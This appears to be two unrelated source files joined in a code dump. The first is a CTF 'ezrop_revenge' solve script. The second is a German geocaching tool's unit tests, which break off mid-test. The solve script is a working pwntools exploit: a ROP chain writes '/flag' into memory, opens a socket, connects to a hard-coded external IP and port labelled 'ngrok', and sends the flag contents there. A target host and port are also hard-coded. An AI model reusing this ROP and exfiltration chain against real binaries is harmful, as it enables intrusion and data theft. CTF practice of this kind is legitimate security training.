pwn/ezrop_revenge/solve.py
|
vidner/codepwnda-ctf
|
7e086044b753fe555b44395b79827d2f5b89da1d
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
from pwn import *
context.terminal = ['tmux', 'split-window', '-h']
context.log_level = ['debug', 'info', 'warn'][1]
BINARY = './chall'
HOST = '35.185.187.162'
PORT = 17005
# 0x08057bd2: mov dword ptr [edx], eax; ret;
# 0x0806ee8b: pop edx; ret;
# 0x080ab5ca: pop eax; ret;
# 0x0806eeb2: pop ecx; pop ebx; ret;
# 0x0806f7c0: int 0x80; ret;
def syscall(eax, ebx=0, ecx=0, edx=0):
payload = p32(0x0806ee8b)
payload += p32(edx)
payload += p32(0x080ab5ca)
payload += p32(eax)
payload += p32(0x0806eeb2)
payload += p32(ecx)
payload += p32(ebx)
payload += p32(0x0806f7c0)
return payload
def write_where_what(where, what):
payload = p32(0x080ab5ca)
payload += p32(what)
payload += p32(0x0806ee8b)
payload += p32(where)
payload += p32(0x08057bd2)
return payload
def write_str(where, data):
payload = ''
data_split = [data[i:i+4].ljust(4, '\x00') for i in range(0, len(data), 4)]
for d in data_split:
payload += write_where_what(where, u32(d))
where += 4
return payload
def exploit(REMOTE):
if not REMOTE: gdb.attach(r, 'b *0x0806f7c0')
payload = 'AAAAAAAAAAAAAAAAAAAA'
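    # x86 syscall numbers used below: 5 = open, 3 = read, 4 = write,
    # 0x66 = socketcall (sub-call 1 = SYS_SOCKET, 3 = SYS_CONNECT).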
# open flag
payload += write_str(elf.bss(0x10), '/flag\x00')
payload += syscall(5, elf.bss(0x10), 0, 0)
# open socket
sock_arg = p32(2)
sock_arg += p32(1)
sock_arg += p32(0)
payload += write_str(elf.bss(0x20), sock_arg)
payload += syscall(0x66, 1, elf.bss(0x20))
# connect
IPHEX = 0x67853813
IPHEX = 0x030ed4ad # ngrok
    connect_struct = p32(0x0b290002) # sin_family = AF_INET (2), sin_port = 0x290b -> port 10507 (network byte order)
connect_struct += p32(IPHEX)[::-1]
payload += write_str(elf.bss(0x30), connect_struct)
connect_arg = p32(1) # sockfd
connect_arg += p32(elf.bss(0x30)) # connect_struct
connect_arg += p32(0x10) # idk
payload += write_str(elf.bss(0x100), connect_arg)
payload += syscall(0x66, 3, elf.bss(0x100))
# read flag
payload += syscall(3, 0, elf.bss(0x200), 0x100)
# write to socket
payload += syscall(4, 1, elf.bss(0x200), 0x100)
r.sendafter('\n', payload)
if __name__ == '__main__':
REMOTE = len(sys.argv) > 1
elf = ELF(BINARY, checksec=False)
if REMOTE:
r = remote(HOST, PORT)
else:
r = elf.process(aslr=False)
info(r.pid)
exploit(REMOTE)
r.interactive()
| 25.414894 | 79 | 0.616995 |
15c28f57a5f1b0090f228689a2392ab6c22ad488
| 48,172 |
py
|
Python
|
tests/test_user_io.py
|
S0S-90/geocachingTooly
|
a6ed356d0187dd517a9436a83bded3752d488db5
|
[
"MIT"
] | null | null | null |
tests/test_user_io.py
|
S0S-90/geocachingTooly
|
a6ed356d0187dd517a9436a83bded3752d488db5
|
[
"MIT"
] | null | null | null |
tests/test_user_io.py
|
S0S-90/geocachingTooly
|
a6ed356d0187dd517a9436a83bded3752d488db5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""tests for user_io.py"""
import unittest
from unittest import mock
import sys
from io import StringIO
import test_frame
import user_io
import geocache
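# Two capture patterns are used throughout: sys.stdout is redirected to a
# StringIO object to check printed output, and builtins.input is patched
# with unittest.mock to feed canned user input.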
class TestGeneralOutput(unittest.TestCase):
def test_normaltext(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("hello") # fill out
output = out.getvalue() # save value of out in output
self.assertEqual(output, "hello\n")
def test_textwithcapitalsandnumbers(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("hEllo2") # fill out
output = out.getvalue() # save value of out in output
self.assertEqual(output, "hEllo2\n")
def test_umlauts(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("m{}rchen".format("\u00E4")) # fill out
output = out.getvalue() # save value of out in output
self.assertEqual(output, "m{}rchen\n".format("\u00E4"))
def test_replacable_signs(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("hello {}".format("\u263a")) # fill out
output = out.getvalue() # save value of out in output
self.assertEqual(output, "hello :-)\n")
def test_unknown_signs(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.general_output("Flag Turkey: {}".format("\u262a")) # fill out
output = out.getvalue() # save value of out in output
self.assertEqual(output, "Flag Turkey: {}\n".format("\u001a"))
class TestGeneralInput(unittest.TestCase):
def test_normaltext(self):
with mock.patch('builtins.input', return_value="hello"):
self.assertEqual(user_io.general_input(">> "), 'hello')
def test_textwithcapitalsandnumbers(self):
with mock.patch('builtins.input', return_value="hEllo2"):
self.assertEqual(user_io.general_input(">> "), 'hEllo2')
def test_replacable_signs(self):
with mock.patch('builtins.input', return_value="hello {}".format("\u263a")):
self.assertEqual(user_io.general_input(">> "), "hello {}".format("\u263a"))
def test_umlauts(self):
with mock.patch('builtins.input', return_value="m{}rchen".format("\u00E4")):
self.assertEqual(user_io.general_input(">> "), "m{}rchen".format("\u00E4"))
def test_unknown_signs(self):
with mock.patch('builtins.input', return_value="Flag Turkey: {}".format("\u262a")):
self.assertEqual(user_io.general_input(">> "), "Flag Turkey: {}".format("\u262a"))
def test_number(self):
with mock.patch('builtins.input', return_value="42"):
self.assertEqual(user_io.general_input(">> "), "42")
class TestShowMainMenu(unittest.TestCase):
def test_nofoundexists(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.show_main_menu(False) # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Geocaches aktualisieren\n"
expected += "2: Alle auf dem Geraet gespeicherten Geocaches sortieren und anzeigen\n"
expected += "3: Wegpunkt-Menue\n"
expected += "4: Karten-Menue\n"
expected += "5: Beschreibung fuer einen bestimmten Cache anzeigen (GC-Code erforderlich)\n"
expected += "6: Geocaches durchsuchen\n"
expected += "7: Programm verlassen\n"
self.assertEqual(output, expected)
def test_foundexists(self):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.show_main_menu(True) # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Geocaches aktualisieren\n"
expected += "2: Alle auf dem Geraet gespeicherten Geocaches sortieren und anzeigen\n"
expected += "3: Wegpunkt-Menue\n"
expected += "4: Karten-Menue\n"
expected += "5: Beschreibung fuer einen bestimmten Cache anzeigen (GC-Code erforderlich)\n"
expected += "6: Geocaches durchsuchen\n"
expected += "7: Alle gefundenen Caches anzeigen\n"
expected += "8: Programm verlassen\n"
self.assertEqual(output, expected)
class TestMainMenu(unittest.TestCase):
def test_1_nofoundexists(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.main_menu(False), 'update')
def test_2_nofoundexists(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.main_menu(False), 'show_all')
def test_3_nofoundexists(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.main_menu(False), 'show_waypoints')
def test_4_nofoundexists(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.main_menu(False), 'map-menu')
def test_5_nofoundexists(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.main_menu(False), 'show_one')
def test_6_nofoundexists(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.main_menu(False), 'search')
def test_7_nofoundexists(self):
with mock.patch('builtins.input', return_value="7"):
self.assertEqual(user_io.main_menu(False), 'exit')
def test_11_nofoundexists(self):
with mock.patch('builtins.input', return_value="11"):
self.assertEqual(user_io.main_menu(False), None)
def test_1_foundexists(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.main_menu(True), 'update')
def test_2_foundexists(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.main_menu(True), 'show_all')
def test_3_foundexists(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.main_menu(False), 'show_waypoints')
def test_4_foundexists(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.main_menu(True), 'map-menu')
def test_5_foundexists(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.main_menu(True), 'show_one')
def test_6_foundexists(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.main_menu(True), 'search')
def test_7_foundexists(self):
with mock.patch('builtins.input', return_value="7"):
self.assertEqual(user_io.main_menu(True), 'show_founds')
def test_8_foundexists(self):
with mock.patch('builtins.input', return_value="8"):
self.assertEqual(user_io.main_menu(True), 'exit')
class TestMapMenu(unittest.TestCase):
def test_output(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.map_menu() # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Alle auf dem Geraet gespeicherten Geocaches auf Karte zeigen (INTERNET!!!)\n"
expected += "2: https://www.geocaching.com/map aufrufen (INTERNET!!!)\n"
expected += "3: https://www.google.de/maps aufrufen (INTERNET!!!)\n"
self.assertEqual(output, expected)
def test_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.map_menu(), 'show_on_map')
def test_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.map_menu(), 'gc-maps')
def test_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.map_menu(), 'google-maps')
def test_bullshit(self):
with mock.patch('builtins.input', return_value="blub"):
self.assertIsNone(user_io.map_menu())
class TestSortCaches(unittest.TestCase):
def test_gccode(self):
with mock.patch('builtins.input', side_effect=['1', '1']):
self.assertEqual(user_io.sort_caches(), ["gccode", False])
def test_name(self):
with mock.patch('builtins.input', side_effect=['2', '1']):
self.assertEqual(user_io.sort_caches(), ["name", False])
def test_type(self):
with mock.patch('builtins.input', side_effect=['3', '1']):
self.assertEqual(user_io.sort_caches(), ["type", False])
def test_difficulty(self):
with mock.patch('builtins.input', side_effect=['4', '1']):
self.assertEqual(user_io.sort_caches(), ["difficulty", False])
def test_terrain(self):
with mock.patch('builtins.input', side_effect=['5', '1']):
self.assertEqual(user_io.sort_caches(), ["terrain", False])
def test_size(self):
with mock.patch('builtins.input', side_effect=['6', '1']):
self.assertEqual(user_io.sort_caches(), ["size", False])
def test_downloaddate(self):
with mock.patch('builtins.input', side_effect=['7', '1']):
self.assertEqual(user_io.sort_caches(), ["downloaddate", False])
def test_available(self):
with mock.patch('builtins.input', side_effect=['8', '1']):
self.assertEqual(user_io.sort_caches(), ["available", False])
def test_distance(self):
with mock.patch('builtins.input', side_effect=['9', '1']):
self.assertEqual(user_io.sort_caches(), ["distance", False])
def test_gccode_backwards(self):
with mock.patch('builtins.input', side_effect=['1', '2']):
self.assertEqual(user_io.sort_caches(), ["gccode", True])
def test_name_backwards(self):
with mock.patch('builtins.input', side_effect=['2', '2']):
self.assertEqual(user_io.sort_caches(), ["name", True])
def test_type_backwards(self):
with mock.patch('builtins.input', side_effect=['3', '2']):
self.assertEqual(user_io.sort_caches(), ["type", True])
def test_difficulty_backwards(self):
with mock.patch('builtins.input', side_effect=['4', '2']):
self.assertEqual(user_io.sort_caches(), ["difficulty", True])
def test_terrain_backwards(self):
with mock.patch('builtins.input', side_effect=['5', '2']):
self.assertEqual(user_io.sort_caches(), ["terrain", True])
def test_size_backwards(self):
with mock.patch('builtins.input', side_effect=['6', '2']):
self.assertEqual(user_io.sort_caches(), ["size", True])
def test_downloaddate_backwards(self):
with mock.patch('builtins.input', side_effect=['7', '2']):
self.assertEqual(user_io.sort_caches(), ["downloaddate", True])
def test_available_backwards(self):
with mock.patch('builtins.input', side_effect=['8', '2']):
self.assertEqual(user_io.sort_caches(), ["available", True])
def test_distance_backwards(self):
with mock.patch('builtins.input', side_effect=['9', '2']):
self.assertEqual(user_io.sort_caches(), ["distance", True])
def test_criterion0(self):
with mock.patch('builtins.input', side_effect=['0', '2']):
self.assertEqual(user_io.sort_caches(), ["gccode", True])
def test_criterion_invalid(self):
with mock.patch('builtins.input', side_effect=['bla', '1']):
self.assertEqual(user_io.sort_caches(), ["gccode", False])
def test_revert_invalid(self):
with mock.patch('builtins.input', side_effect=['1', '0']):
self.assertEqual(user_io.sort_caches(), ["gccode", False])
def test_output_normal(self):
with mock.patch('builtins.input', side_effect=['3', '2']):
out = StringIO()
sys.stdout = out
user_io.sort_caches()
output = out.getvalue()
expected = "\nWonach sollen die Geocaches sortiert werden?\n"
expected += "1: GC-Code\n"
expected += "2: Name\n"
expected += "3: Cache-Typ\n"
expected += "4: D-Wertung\n"
expected += "5: T-Wertung\n"
expected += "6: Groesse\n"
expected += "7: Download-Datum\n"
expected += "8: Verfuegbarkeit\n"
expected += "9: Abstand von einer bestimmten Position (Koordinaten erforderlich)\n"
expected += "In welche Richtung sollen die Caches sortiert werden?\n"
expected += "1: aufsteigend\n"
expected += "2: absteigend\n"
self.assertEqual(output, expected)
def test_output_criterion_invalid(self):
with mock.patch('builtins.input', side_effect=['0', '2']):
out = StringIO()
sys.stdout = out
user_io.sort_caches()
output = out.getvalue()
expected = "\nWonach sollen die Geocaches sortiert werden?\n"
expected += "1: GC-Code\n"
expected += "2: Name\n"
expected += "3: Cache-Typ\n"
expected += "4: D-Wertung\n"
expected += "5: T-Wertung\n"
expected += "6: Groesse\n"
expected += "7: Download-Datum\n"
expected += "8: Verfuegbarkeit\n"
expected += "9: Abstand von einer bestimmten Position (Koordinaten erforderlich)\n"
expected += "Ungueltige Eingabe: Sortierung erfolgt nach GC-Code\n"
expected += "In welche Richtung sollen die Caches sortiert werden?\n"
expected += "1: aufsteigend\n"
expected += "2: absteigend\n"
self.assertEqual(output, expected)
class TestSearch(unittest.TestCase):
def test_name(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.search(), "name")
def test_description(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.search(), "description")
def test_type(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.search(), "type")
def test_difficulty(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.search(), "difficulty")
def test_terrain(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.search(), "terrain")
def test_size(self):
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.search(), "size")
def test_downloaddate(self):
with mock.patch('builtins.input', return_value="7"):
self.assertEqual(user_io.search(), "downloaddate")
def test_available(self):
with mock.patch('builtins.input', return_value="8"):
self.assertEqual(user_io.search(), "available")
def test_attribute(self):
with mock.patch('builtins.input', return_value="9"):
self.assertEqual(user_io.search(), "attribute")
def test_distance(self):
with mock.patch('builtins.input', return_value="10"):
self.assertEqual(user_io.search(), "distance")
def test_0(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.search(), None)
def test_invalid(self):
with mock.patch('builtins.input', return_value="bla"):
self.assertEqual(user_io.search(), None)
def test_output_normal(self):
with mock.patch('builtins.input', return_value="2"):
out = StringIO()
sys.stdout = out
user_io.search()
output = out.getvalue()
expected = "\nWonach willst du suchen?\n"
expected += "1: Name\n"
expected += "2: Beschreibung\n"
expected += "3: Cache-Typ\n"
expected += "4: D-Wertung\n"
expected += "5: T-Wertung\n"
expected += "6: Groesse\n"
expected += "7: Download-Datum\n"
expected += "8: Verfuegbarkeit\n"
expected += "9: Attribut\n"
expected += "10: Abstand von einer bestimmten Position (Koordinaten erforderlich)\n"
self.assertEqual(output, expected)
def test_output_invalid(self):
with mock.patch('builtins.input', return_value="bla"):
out = StringIO()
sys.stdout = out
user_io.search()
output = out.getvalue()
expected = "\nWonach willst du suchen?\n"
expected += "1: Name\n"
expected += "2: Beschreibung\n"
expected += "3: Cache-Typ\n"
expected += "4: D-Wertung\n"
expected += "5: T-Wertung\n"
expected += "6: Groesse\n"
expected += "7: Download-Datum\n"
expected += "8: Verfuegbarkeit\n"
expected += "9: Attribut\n"
expected += "10: Abstand von einer bestimmten Position (Koordinaten erforderlich)\n"
expected += "Ungueltige Eingabe\n"
self.assertEqual(output, expected)
class TestSearchType(unittest.TestCase):
def test_return(self):
with mock.patch('builtins.input', return_value="Traditional Cache"):
self.assertEqual(user_io.search_type(), "Traditional Cache")
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.search_type()
output = out.getvalue()
expected = "Gib den Cachetyp ein, nach dem du suchen willst.\n"
expected += "Moegliche Typen: Traditional Cache, Multi-cache, Mystery Cache, EarthCache, "
expected += "Letterbox Hybrid, Event Cache, Wherigo Cache, Geocaching HQ, Unknown Type\n"
expected += "Achtung! Gross- und Kleinschreibung beachten!\n"
self.assertEqual(output, expected)
class TestSearchAttribute(unittest.TestCase):
def test_return(self):
with mock.patch('builtins.input', return_value="does not need to be an attr"):
self.assertEqual(user_io.search_attribute(["attr1", "attr2"]), "does not need to be an attr")
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.search_attribute(["attr1", "attr2"])
output = out.getvalue()
expected = "Gib das Attribut ein, nach dem du suchen willst.\n"
expected += "Moegliche Attribute: attr1, attr2\n"
self.assertEqual(output, expected)
class TestActionsAfterSearch(unittest.TestCase):
def test_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.actions_after_search(), "show_again")
def test_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.actions_after_search(), "delete")
def test_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.actions_after_search(), "show_on_map")
def test_4(self):
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.actions_after_search(), "show_one")
def test_5(self):
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.actions_after_search(), "back")
def test_other(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.actions_after_search(), None)
def test_output(self):
with mock.patch('builtins.input', return_value="1"):
out = StringIO()
sys.stdout = out
user_io.actions_after_search()
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Alle Suchergebnisse erneut anzeigen (bei evtl. Loeschen nicht aktualisiert)\n"
expected += "2: Alle Suchergebnisse loeschen\n"
expected += "3: Alle Suchergebnisse auf Karte zeigen (INTERNET!!!)\n"
expected += "4: Beschreibung fuer eines der Suchergebnisse anzeigen\n"
expected += "5: zurueck\n"
self.assertEqual(output, expected)
def test_output_invalid_input(self):
with mock.patch('builtins.input', return_value="bla"):
out = StringIO()
sys.stdout = out
user_io.actions_after_search()
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Alle Suchergebnisse erneut anzeigen (bei evtl. Loeschen nicht aktualisiert)\n"
expected += "2: Alle Suchergebnisse loeschen\n"
expected += "3: Alle Suchergebnisse auf Karte zeigen (INTERNET!!!)\n"
expected += "4: Beschreibung fuer eines der Suchergebnisse anzeigen\n"
expected += "5: zurueck\n"
expected += "Ungueltige Eingabe\n"
self.assertEqual(output, expected)
class TestActionsWithFounds(unittest.TestCase):
def test_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.actions_with_founds(), "log")
def test_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.actions_with_founds(), "delete")
def test_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.actions_with_founds(), "exit")
def test_other(self):
with mock.patch('builtins.input', return_value="0"):
self.assertEqual(user_io.actions_after_search(), None)
def test_output(self):
with mock.patch('builtins.input', return_value="3"):
out = StringIO()
sys.stdout = out
user_io.actions_with_founds()
output = out.getvalue()
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Gefundene Caches auf geocaching.com loggen "
expected += "(ueber den Upload von drafts / fieldnotes, INTERNET!!!)\n"
expected += "2: Alle gefundenen Caches loeschen\n"
expected += "3: zurueck\n"
self.assertEqual(output, expected)
class TestConfirmDeletion(unittest.TestCase):
def test_yes(self):
with mock.patch('builtins.input', return_value="y"):
self.assertEqual(user_io.confirm_deletion(), True)
def test_no(self):
with mock.patch('builtins.input', return_value="n"):
self.assertEqual(user_io.confirm_deletion(), False)
def test_nonsense(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
self.assertEqual(user_io.confirm_deletion(), False)
class TestWaypointMenu(unittest.TestCase):
def test_output_no_waypoints(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.waypoint_menu(False) # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Wegpunkte hinzufuegen\n"
expected += "2: nichts\n"
self.assertEqual(output, expected)
def test_output_waypoints(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.waypoint_menu(True) # fill out
output = out.getvalue() # save value of out in output
expected = "\nWas moechtest du als naechstes tun?\n"
expected += "1: Wegpunkte hinzufuegen\n"
expected += "2: Wegpunkte zu Geocaches zuordnen oder loeschen\n"
expected += "3: nichts\n"
self.assertEqual(output, expected)
def test_no_waypoints_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.waypoint_menu(False), 'add')
def test_no_waypoints_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.waypoint_menu(False), 'continue')
def test_no_waypoints_shit(self):
with mock.patch('builtins.input', return_value="shit"):
self.assertEqual(user_io.waypoint_menu(False), 'continue')
def test_waypoints_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.waypoint_menu(True), 'add')
def test_waypoints_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.waypoint_menu(True), 'assign')
def test_no_waypoints_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.waypoint_menu(True), 'continue')
class TestChooseCache(unittest.TestCase):
def test_bullshit_suggestions_give_error(self):
self.assertRaises(TypeError, user_io.choose_cache, "bla", False)
def test_no_suggestions_no_more_options_output(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.choose_cache([], False) # fill out
output = out.getvalue() # save value of out in output
expected = "Keine Vorschlaege vorhanden. Was nun?\n"
expected += "1: zu anderem Geocache zuordnen (GC-Code erforderlich)\n"
expected += "2: Wegpunkt doch nicht zuordnen\n"
self.assertEqual(output, expected)
def test_no_suggestions_more_options_output(self):
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.choose_cache([], True) # fill out
output = out.getvalue() # save value of out in output
expected = "Keine Vorschlaege vorhanden. Was nun?\n"
expected += "1: zu anderem Geocache zuordnen (GC-Code erforderlich)\n"
expected += "2: Wegpunkt loeschen\n"
expected += "3: nichts tun\n"
self.assertEqual(output, expected)
def test_no_suggestions_no_more_options_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.choose_cache([], False), 'other')
def test_no_suggestions_no_more_options_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.choose_cache([], False), 'continue')
def test_no_suggestions_no_more_options_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.choose_cache([], False), 'continue')
def test_no_suggestions_more_options_1(self):
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.choose_cache([], True), 'other')
def test_no_suggestions_more_options_2(self):
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.choose_cache([], True), 'delete')
def test_no_suggestions_more_options_3(self):
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.choose_cache([], True), 'continue')
def test_suggestions_no_more_options_output(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.choose_cache([gc1, gc2, gc3], False) # fill out
output = out.getvalue() # save value of out in output
expected = "Zu welchem der folgenden Caches moechtest du den Wegpunkt zuordnen?\n"
expected += "1: Cachertreffen Würzburg, die 54ste (GC78K5W)\n"
expected += "2: Saaletalblick (GC6K86W)\n"
expected += "3: Hochschule für Musik 1 (GC6RNTX)\n"
expected += "4: zu anderem Geocache zuordnen (GC-Code erforderlich)\n"
expected += "5: Wegpunkt doch nicht zuordnen\n"
self.assertEqual(output, expected)
def test_suggestions_more_options_output(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="any bullshit"):
out = StringIO()
sys.stdout = out # capture print output in out
user_io.choose_cache([gc1, gc2, gc3], True) # fill out
output = out.getvalue() # save value of out in output
expected = "Zu welchem der folgenden Caches moechtest du den Wegpunkt zuordnen?\n"
expected += "1: Cachertreffen Würzburg, die 54ste (GC78K5W)\n"
expected += "2: Saaletalblick (GC6K86W)\n"
expected += "3: Hochschule für Musik 1 (GC6RNTX)\n"
expected += "4: zu anderem Geocache zuordnen (GC-Code erforderlich)\n"
expected += "5: Wegpunkt loeschen\n"
expected += "6: nichts tun\n"
self.assertEqual(output, expected)
def test_suggestions_no_more_options_1(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), gc1)
def test_suggestions_no_more_options_2(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), gc2)
def test_suggestions_no_more_options_3(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), gc3)
def test_suggestions_no_more_options_4(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), "other")
def test_suggestions_no_more_options_5(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), "continue")
def test_suggestions_no_more_options_6(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="6"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], False), "continue")
def test_suggestions_more_options_1(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="1"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), gc1)
def test_suggestions_more_options_2(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="2"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), gc2)
def test_suggestions_more_options_3(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="3"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), gc3)
def test_suggestions_more_options_4(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="4"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), "other")
def test_suggestions_more_options_5(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
with mock.patch('builtins.input', return_value="5"):
self.assertEqual(user_io.choose_cache([gc1, gc2, gc3], True), "delete")
def test_suggestions_more_options_6(self):
gc1 = geocache.Geocache(r"../tests/examples/GC78K5W.gpx")
gc2 = geocache.Geocache(r"../tests/examples/GC6K86W.gpx")
gc3 = geocache.Geocache(r"../tests/examples/GC6RNTX.gpx")
